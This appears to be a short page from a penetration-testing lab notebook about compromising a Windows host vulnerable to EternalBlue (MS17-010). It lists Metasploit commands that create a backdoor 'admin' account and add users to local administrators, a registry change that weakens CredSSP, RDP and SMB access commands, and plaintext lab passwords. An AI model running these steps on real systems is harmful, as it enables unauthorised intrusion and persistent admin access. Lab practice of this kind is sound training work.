Relevant

vulnerable to eternal blue

confirming credentials

check if vuln to enternal blue (MS17-010)

add Bob to local admins

fix credSSP error:

// Some useful commands
xfreerdp /v:10.10.1.135 /d:WORKGROUP /u:Bob /h:1100 /w:1600 +clipboard /cert-ignore

Bill - Juw4nnaM4n420696969!$$$
Bob - !P@$$W0rD!123


set CMD net localgroup administrators bob /add
set CMD net user admin admin123!
set CMD net localgroup administrators admin /add

// credssp fix
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters\ /v AllowEncryptionOracle /t REG_DWORD /d 2

smbclient -U Administrator //10.10.1.135/c$


https://www.jamescarroll.me/blog/exploiting-ms17-010-with-metasploit-2020

PreviousBlue (internal blue)NextLazyAdmin

Last updated 2 years ago

Was this helpful?